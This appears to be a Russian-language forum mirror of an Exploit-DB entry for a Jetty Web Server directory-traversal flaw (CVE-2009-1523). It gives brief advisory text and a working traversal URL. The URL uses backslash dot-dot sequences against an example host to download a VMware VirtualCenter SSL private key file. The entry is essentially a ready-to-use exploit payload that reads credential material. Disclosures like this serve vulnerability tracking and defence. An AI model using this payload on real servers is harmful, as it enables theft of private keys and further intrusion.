- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36318
- Проверка EDB
-
- Пройдено
- Автор
- ALEXEY SINTSOV
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2009-1523
- Дата публикации
- 2011-11-18
Jetty Web Server - Directory Traversal
Код:
source: https://www.securityfocus.com/bid/50723/info
Jetty Web Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
http://www.example.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key- Источник
- www.exploit-db.com
